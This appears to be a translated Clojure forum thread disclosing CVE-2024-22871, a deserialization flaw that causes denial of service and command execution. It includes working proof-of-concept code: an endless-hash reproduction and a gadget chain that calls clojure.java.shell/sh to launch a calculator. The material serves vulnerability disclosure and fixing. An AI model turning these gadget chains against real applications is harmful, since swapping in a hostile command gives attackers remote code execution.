请在 2024 Clojure 状态调查! 中分享您的想法。

欢迎!有关本站如何运作的更多信息,请参阅 关于 页面。

提出问题

已关闭 安全问题:在 org.clojure:clojure 中由于反序列化引起的拒绝服务攻击和命令执行

+1
Clojure
已关闭

漏洞报告

在 org.clojure:clojure 中存在一些漏洞,如下所示
- 拒绝服务攻击(clojure 版本 1.2.0 - 1.12.0)

dos

Command Injection

注意,此漏洞无需额外的组件。

详细信息
1.12.0-a5 中的 RCE CallGraph
17069252746231706925273707.png

CVE
- CVE-2024-22871

Clojure 1.11.2 和 1.12.0-alpha9 发布 修复
如以下讨论所示,DOS 攻击可能影响 1.2.0-1.12.0,而带有本地验证的命令执行可能影响 1.9.0-1.12.0。
在我看来,几个当前问题与以下情况相似,但是以新的方式绕过限制的。


https://clojure.atlassian.net/browse/CLJ-2204

修改
我不懂,如果全部都是Java,为什么clojure与之有关?

更新:我理解正确吗,不需要clojure就可以在Java中实现相同的功能?
执行不当,调用图部分依赖于clojure,例如apply、RestFn等。可以在Clojure 1.9.0-1.12.0版本(clojure版本poc)中通过访问匿名函数类来执行命令获得$fn_5920。

1 答案

+3

被选中
 
最佳答案

在不受信任的数据上使用ObjectInputStream具有固有的风险,正如该类的文档本身所说。为什么展示该类的风险被认为只是提供给一些使用类的JAR包中的一个漏洞?

为未来的读者提供一个更容易复现的方法。

(let [out (java.io.ByteArrayOutputStream.)
      obj-out (java.io.ObjectOutputStream. out)
      i (iterate identity nil)]
  (doto (-> i (class) (.getSuperclass) (.getDeclaredField "_hash"))
    (.setAccessible true)
    (.set i (int 1)))
  (.writeObject obj-out (java.util.HashMap. {i nil}))
  (println "Writing is done. Reading...")
  (let [in (java.io.ByteArrayInputStream. (.toByteArray out))
        obj-in (java.io.ObjectInputStream. in)]
    (.readObject obj-in)
    (println "Will never be printed.")))
是的,ObjectInputStream确实引入了潜在的安全风险。然而,对于这个特定的漏洞,问题并不在于讨论导致安全问题的潜在风险。而是,在1.12.0-alpha5版本中,可以构造一个特殊的序列化数据包,这加剧了这些风险的可能危害。这可以在不依赖其他依赖项的情况下完成,并可实现命令执行(看起来process$start是一个新引入的功能)。反序列化的危害通常取决于项目环境,但这个漏洞不需要任何其他依赖,它是JAR包本身的问题。
我明白了。但是,这与1.12.0-alpha5无关——我刚刚添加到回答中的代码可以运行在1.8.0版上以复现这种行为。经过轻微修改,它也可以运行在1.2.0版上(但在此之前不行,因为那时`clojure.lang.Cons`不可序列化)。
是的,这个漏洞仅影响1.12.0-alpha5版本。我还没有对以前的版本进行太多分析,我对它们有其他高风险反序列化漏洞持悲观态度。
顺便说一下,如果可能的话,希望开发者可以发布CVE,尽管我请求了CVE,但我还没有收到回复。
你嘴上说着“是”,但实际上说的是反面的——这个漏洞影响从1.2.0版本起的所有Clojure版本。
by
真的吗?各位,你们是在提到由这个反序列化引起的命令执行漏洞吗?因为我对 Clojure 不太熟悉,我只是从自己的程序分析工具中获得了这个分析结果。
by
除此之外,最让我困惑的是 core$partial$fn__5920 类的生成原理。我用 soot 分析了 clojure.jar,但我更想了解 Clojure 中 core$partial$fn__5920 的实际代码。
by
这个特定的类是从 `partial` 函数的这种用法中生成的:[链接](https://github.com/clojure/clojure/blob/master/src/clj/clojure/core.clj#L2638)
by
谢谢。由于时差,稍后可能难以及时回复。

编辑
另一种执行命令攻击的方法

```clojure
(ns poc.clojure.command
  (:import (clojure.lang PersistentQueue)
           (java.util HashMap ArrayList))
  (:require clojure.java.process))

(defn set-private-field [obj field-name value]
  (let [field (-> (.getClass obj)
                  (.getDeclaredField field-name))]
    (.setAccessible field true)
    (.set field obj value)))

(defn modify-and-process-model [iterate]
  ;; 创建 PersistentQueue
  (let [model (PersistentQueue/EMPTY)]
    ;; 使用 set-private-field 修改 model
    (set-private-field model "f" iterate)
    ;; 返回修改后的 model
    model))

(defn main []
  ;; 创建 HashMap
  (let [map (HashMap.)
        args ["open" "-a" "calculator"]
        ;; 使用 ns-resolve 获取 start 函数并使用 partial 创建部分应用函数
        fn_start (ns-resolve 'clojure.java.shell 'sh)
        partial-fn (partial apply fn_start)
        ;; 使用 clojure.core/iterate 创建 iterate 实例
        iterate-instance (iterate partial-fn args)]

    (let [model (modify-and-process-model iterate-instance)]
      (set-private-field model "_hash" (int 1))
      (.put map model nil)
      (set-private-field model "_hash" (int 0)))

    ;; 序列化 map
    (let [out (java.io.ByteArrayOutputStream.)
          obj-out (java.io.ObjectOutputStream. out)]
      (.writeObject obj-out map)
      (println "写入完成。读取...")

      ;; 反序列化
      (let [in (java.io.ByteArrayInputStream. (.toByteArray out))
            obj-in (java.io.ObjectInputStream. in)]
        (.readObject obj-in)))
    )
  )

  ;; 调用 main 函数
(main)
```
需要注意的是,仅设置 'fn start (ns-resolve 'clojure.java.shell 'sh)' 后,它会影响 1.9.0 - 1.12.0 版本,并可以实现命令执行。
由 Cognitect 代表 Clojure 社区维护
...